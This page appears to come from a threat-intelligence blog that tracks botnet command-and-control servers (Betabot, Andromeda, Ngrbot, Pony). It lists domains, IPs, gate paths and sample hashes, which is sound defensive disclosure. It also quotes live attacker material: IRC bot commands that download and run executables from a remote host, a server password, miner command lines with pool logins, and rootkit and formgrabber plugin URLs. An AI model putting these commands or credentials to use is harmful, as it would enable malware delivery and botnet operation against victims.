Server: 178.79.183.247, 50.2.193.199, 94.229.66.97 Port: 65112 Current global users: 2898, Max: 2988 Channel: ##hug## Topic for ##hug## is: .advscan->random->b root dreamboxTopic for ##hug## set by gaspolo at Fri May 31 13:36:47 2013 Oper: [GaSp`ZzzZ] (~g45p0@5.144.173.5): g45p0[GaSp`ZzzZ] irc.primo.org :Yet another IRC Server running on Debian GNU/Linux[GaSp`ZzzZ] idle 181:02:12, signon: Thu May 30 22:19:39[GaSp`ZzzZ] End of WHOISRead more...
cthulhuhf.net (Betabot http botnet hosted by warez-host.com)
Resolved cthulhuhf.net to 91.223.82.43 Server: cthulhuhf.net Gate file: /misc/order.php Alternate domains: cthulhuhf.eu cthulhuhf.org.uk cthulhuhf.co.uk cthulhuhf.xxx Hosting infos: http://whois.domaintools.com/91.223.82.43 Related md5s (search on malwr.com to download the samples): Beta bot: aa07b845981ba53b6100dba745ba5c1a
www.mydowncenter.me (Andromeda http botnet hosted by pw-service.com)
Resolved www.mydowncenter.me to 37.0.122.132 Server: www.mydowncenter.me Gate file: /andro/image.php Plugins Rootkit: hxxp://www.mydowncenter.me/andro/r.pack Socks: hxxp://www.mydowncenter.me/andro/s.pack Formgrabber: hxxp://www.mydowncenter.me/andro/f.pack Gate file: /andro/fg.php Hosting infos: http://whois.domaintools.com/37.0.122.132 Related md5s (search on malwr.com to download the samples): Andromeda: a26ffa2c7bd0e7899b04768f9e76a938
s5.6d6f6e65797072696e746572.com (Betabot http botnet hosted by infiumhost.com)
Resolved s5.6d6f6e65797072696e746572.com to 188.190.127.160 Server: s5.6d6f6e65797072696e746572.com Gate file: /wp-admin/order.php Alternate domains: ripraktec147.com youdbeproud228.com wyomiriding928.com Mining info: svchost.exe’ -I 100 -T 200 -t 2 -o stratum+tcp://s2.6d6f6e65797072696e746572.com:3333 -u mp187.her -p lex Hosting infos: http://whois.domaintools.com/188.190.127.160 Related md5s (search on malwr.com to download the samples): Betabot: db9a816d58899f1ba92bc338e89f856a
blackhats.su (Betabot http botnet proxied by cloudflare)
Server: blackhats.su Gate file: /bb/order.php Alternate domains: aeonhf.net aeonhf.me You may recognize one of the domains, as it has appeared on the blog before. They used cloudflare that time as well. Lets see if we can get cloudflare to block access to it again. Related md5s (search on malwr.com to download the samples): Beta bot:Read more...
breathespacesfacebook.org (Socks5Masterz botnet hosted by burst.net)
Resolved breathespacesfacebook.org to 46.37.162.26 Server: breathespacesfacebook.org Gate file: /gate.php Altnerate domains: tweaksights.org gotoguydreamed.org percussiontasked.org tenmileage.org Hosting infos: http://whois.domaintools.com/46.37.162.26 Related md5s (search on malwr.com to download the samples): Proxy bot: 7dc68e49d035107d132e19adf9f23d3b
t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)
Resolved t.baerr01.com to 122.195.244.35, 60.172.229.40, 60.169.73.119, 121.14.212.125, 121.12.123.140, 124.232.150.181, 222.88.194.187 Server: t.baerr01.com Port: 6512 Server password: smart Channel: #dpi :hub.us.com 332 n[US{XPu{pwvvvwa #dpi :!mdns hxxp://146.185.246.192/av.txt !dl hxxp://146.185.246.192/111.exe !dl hxxp://146.185.246.192/brentback.exe !dl hxxp://146.185.246.192/dqw7.exe Channel: #tar Channel password: smart A modified ircd is used, making it difficult to connect using a regular irc client. Related md5s (search onRead more...
www.welovegiveaways.net (Andromeda http botnet hosted by enzu.com)
Resolved www.welovegiveaways.net to 199.229.235.250 Server: www.welovegiveaways.net Gate file: /justricewithwater/image.php Plugins: Rootkit: hxxp://www.welovegiveaways.net/justricewithwater/r.pack Bitcoin mining info: Shell.exe” -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1 -p none -t 0 -I 10macromedia.exe” -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1 -p none -g no Hosting infos: http://whois.domaintools.com/199.229.235.250
knwns.de (Betabot http botnet hosted by balticservers.com)
Resolved knwns.de to 5.199.166.226 Server: knwns.de Gate file: /bst/order.php Hosting infos: http://whois.domaintools.com/5.199.166.226
toxhoster.net (Pony loader hosted by ecatel.net)
Resolved toxhoster.net to 80.82.79.35 Server: toxhoster.net Gate file: /forum/gate.php Some idiot set it to download itself from the server, so it will run in an endless loop of stealing passwords, sending logs, and then downloading and running itself. Hosting infos: http://whois.domaintools.com/80.82.79.35 Related md5s (search on malwr.com to download the samples): b22258989a5e93d4cb1c3960441c1c06